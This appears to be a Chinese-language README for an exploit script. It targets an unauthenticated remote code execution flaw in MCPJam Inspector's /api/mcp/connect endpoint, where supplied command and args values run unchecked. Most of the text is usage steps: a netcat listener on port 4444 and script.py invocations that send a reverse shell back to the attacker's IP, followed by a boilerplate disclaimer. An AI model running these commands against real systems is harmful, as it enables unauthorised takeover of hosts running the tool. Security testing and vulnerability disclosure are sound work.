MCPJam Inspector 在 /api/mcp/connect 端点存在一个未经验证的远程代码执行(RCE)漏洞。攻击者可以通过发送恶意的 MCP 服务器配置载荷来执行任意命令。
该端点接受一个包含 serverConfig 对象的 JSON 载荷,其中包含 command 和 args 数组,这些内容会在系统上直接执行,未经过适当的验证或清理。
requests 库:pip install requestsnetcat 或 socat 用于监听器终端 1 - 启动监听器:
nc -lvnp 4444
终端 2 - 运行漏洞利用脚本:
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 4444
# 默认(端口 6274,回调端口 4444)
python3 script.py <TARGET_IP> -l <YOUR_IP>
# 自定义 MCPJam 端口
python3 script.py <TARGET_IP> -p 6274 -l <YOUR_IP>
# 自定义监听器端口
python3 script.py <TARGET_IP> -l <YOUR_IP> --lport 5555
/api/mcp/connect 端点⚠️ 免责声明:
此漏洞利用脚本仅供教育和授权的安全测试用途。未经授权访问计算机系统是违法的。用户需自行承担以下责任:
作者不对因使用此工具导致的滥用或损害承担任何责任。使用风险自负。
/api/mcp/connect